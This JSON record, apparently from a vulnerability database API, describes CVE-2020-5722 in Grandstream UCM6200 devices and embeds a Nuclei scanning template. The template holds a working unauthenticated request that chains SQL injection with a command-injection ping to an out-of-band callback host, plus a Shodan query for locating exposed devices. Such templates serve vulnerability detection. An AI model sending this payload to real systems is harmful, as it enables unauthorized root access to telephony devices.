{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-5722/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-5722/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-5722/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-5722/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-5722/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-5722"},"sightings":{"href":"/api/v1/sightings/cve-2020-5722"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-5722.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-5722\n\ninfo:\n  name: Grandstream UCM6200 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.\n  impact: |\n    Attackers can execute root shell commands or inject malicious HTML, leading to full device compromise or phishing attacks.\n  remediation: |\n    Update to version 1.0.19.20 or later for root command execution fix, and version 1.0.20.17 or later for email injection fix.\n  reference:\n    - https://threatprotect.qualys.com/2020/04/01/grandstream-ucm62xx-remote-code-execution-vulnerability/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-5722\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-5722\n    epss-score: 0.84406\n    epss-percentile: 0.99688\n    cwe-id: CWE-89\n  metadata:\n    verified: false\n    max-request: 1\n    shodan-query: 'ssl:\"Grandstream\" \"Set-Cookie: TRACKID\"'\n  tags: cve,cve2020,grandstream,sqli,rce,vuln,kev,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /cgi? HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        Content-Length: 87\n\n        action=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}{{interactsh-url}}`;`\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"application/json\")'\n          - 'interactsh_protocol == \"dns\"'\n        condition: and\n# digest: 4b0a0048304602210082dff20b9e15caea238a1752676a4777d5b0eb4191b70a41feb65580eb59e7890221008e4768160bdc5a100d222304297f9252ae3ea0ab07be4309a3f152a08804081d:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-5722"}